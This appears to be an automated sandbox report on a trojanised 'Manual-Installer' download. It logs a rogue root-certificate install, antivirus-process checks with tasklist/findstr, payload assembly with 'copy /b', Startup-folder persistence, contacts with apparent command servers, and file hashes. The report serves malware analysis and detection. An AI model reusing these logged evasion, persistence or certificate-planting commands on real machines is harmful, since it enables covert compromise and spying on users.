| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download.tt2dd.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6579758,0x7fef6579768,0x7fef6579778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1096 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1568 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2256 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2236 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1372 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2848 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1796 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3524 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1352,i,3012831875964550512,17875340994073489087,131072 /prefetch:8
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar.gz
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\" -spe -an -ai#7zMap5309:146:7zEvent20005
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\" -spe -an -ai#7zMap31036:228:7zEvent23439
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe
"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Reprint Reprint.cmd & Reprint.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 55206725
C:\Windows\SysWOW64\findstr.exe
findstr /V "pastinvitationinformalimproving" Does
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Bikini + Relief + Fw + Maximize + Bases 55206725\q
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\Announcement.pif
55206725\Announcement.pif 55206725\q
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\LynxChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & exit
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe
"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Broken Broken.cmd & Broken.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 1181
C:\Windows\SysWOW64\findstr.exe
findstr /V "BluesAlgeriaDefinedIntersection" Pressed
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Breakfast + Dinner + Steven 1181\Q
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\1181\Equivalent.pif
1181\Equivalent.pif 1181\Q
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\55206725\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | download.tt2dd.com | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | download.tt2dd.com | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| US | 8.8.8.8:53 | dhiqaragency.com | udp |
| US | 172.67.215.245:443 | dhiqaragency.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | KUZLiTEaapNEWFMhPiGnHQGgq.KUZLiTEaapNEWFMhPiGnHQGgq | udp |
| US | 8.8.8.8:53 | BDMkHBPzrNwUIRfHIVtQKUDid.BDMkHBPzrNwUIRfHIVtQKUDid | udp |
| UA | 45.89.53.206:4663 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
Files
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
\??\pipe\crashpad_1492_PJAEOWBDUFWQUKTJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1557f9777c7b53d78e539696402dec18 |
| SHA1 | c9a73e8e990c6192fd4c37bea193364808d04c0c |
| SHA256 | 5825531bf0f8b89bdc183c802605710722ff51eda7e38b78871049f23fc65687 |
| SHA512 | d43b344eb2629030d1ff32ce872631299bb439ef0ef0d05b6719c3f95272c78635e62116ff3fac08bbd4054db0cf3df11c36f141d76d5ad00f6ef346f41e8212 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c5f4e9525a3e44b96dbb4a7af99423e8 |
| SHA1 | 3416df323a24936682047113c079a79dd957b170 |
| SHA256 | cd5a6ad6f57c5e9f493a28a3801cd4125e1d8bec8bce7207a89c94767a1e9010 |
| SHA512 | 77ba74314267880867af0fd1f032c60266ab91fd3bf20aea18b738e6337e6b7e547789c069065f177a0d9272c30684a55646f1d7d725ded6a1f8dfb2962daa20 |
C:\Users\Admin\AppData\Local\Temp\Cab84CB.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar84EE.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 31e49778302a8110f2d143e298ca49b9 |
| SHA1 | 8d66faead59a5f21a0b661ebeecbedbc7962fedf |
| SHA256 | bd43dc6f742171eab6196225fac829cacf3e83b4f93dd65fa805887f07ad815c |
| SHA512 | 72a85f481e596c597713f7a3823fb31d96c130f9dc5296cbf5ec4584c300a2bca62a8e6fd814267bb20f02b19d7908778bf34b22706ee5f7bb0cafa5a95beff4 |
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar.gz
| MD5 | 712e95f9d0c5c7359aeaab697e099f9e |
| SHA1 | 9ff66a4d79e060d764093b70fe68949b62edf439 |
| SHA256 | d954514846c34e32e4cc7a29b840e4842a9dc7146c7daeb8ed454e301f52f7bf |
| SHA512 | 7582f4d0a001df350a0ae4da5e189388017c63345dc06e3c2656baa3e931688b4e8c0c127b107730f71dc3723e10ebf67fd1de17edac6fd29f15f23fed296b9f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 2a57e53cdf2668ab7d18f214735e5fab |
| SHA1 | 7c4ffde4b7714bd9bae3ed0660ecb870b00c9b5a |
| SHA256 | a28dd5532237248fa66e4bc7f926430df406b77b1490049572cf9673f6ea6709 |
| SHA512 | 57edbcdbaab9cdf15894bab9da5f1330134ad623d2a5c009be4be39bf0a87e0f54b5172e891e7969c5394445b210fd2e0838ec92c65cc3d916e8fed7db9e44ff |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8fa3cb35a1bec533e9564e19c045b309 |
| SHA1 | 4adb4378e9f9b63b42bf923e8e63779aaf1d7157 |
| SHA256 | 8338c2cf73f69cad6dd506dc364cc85b5e369e34cb8c3566b0a30426c5a8ef91 |
| SHA512 | 0b93783ab89b57f7f45388524f67aae6bf9870f818a57dbd787c2bc8a0e0b4ecaa79eeb8829ebf1807b8cf30aa0a8e0e3c18438d56494da6e4ee8e4ed2c16b34 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 9b5eba4537c8c978aeb4c26ec02d4c48 |
| SHA1 | c3b88952c4388c497d32c30d8475741258a4dbe6 |
| SHA256 | a0beffdd3cedaf41081806512744d5e9fe4f2d6e38d4b44b68a55b4626f6f32c |
| SHA512 | f09b1ba8dfdce1b991ab5675515c12658de83d30369a408d82d6df50e71e94592ddba378ebc3d9a4aa0c4f8491b571739c1fc9a2cdb5361be156edcdc22af048 |
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\bin\Debug\MusicPlayerApp.vshost.exe.config
| MD5 | 28960c034283c54b6f70673f77fd07fa |
| SHA1 | 914b9e3f9557072ea35ec5725d046b825ef8b918 |
| SHA256 | 8d65429e0b2a82c11d3edc4ea04ed200aedfea1d7ef8b984e88a8e97cff54770 |
| SHA512 | d30dd93457a306d737aac32c0944880517ed4c3e8f2d1650ffca6c1d98e892082b41b40fb89ccf75d5f03d2464b0b4f943cd4b082071f0abfe978d149bd61479 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Reprint
| MD5 | 55dd4a20f7eeebd633cd9686d55a6fb2 |
| SHA1 | 400dcd289e265494671d162731aea59eacceab0d |
| SHA256 | dff5d673567b73e1bb4ecc210d61d1db5a5653920cb2aba84d1cef5d6d3ebabe |
| SHA512 | 59748f5fd92a00d3234c06ce3335cd9b387a48449b454aef915ab539d13de2c5983892c9d88fd713327b2fa67e5ec2b1f2e2417a52fb38f4c4b56f079d8a6d16 |
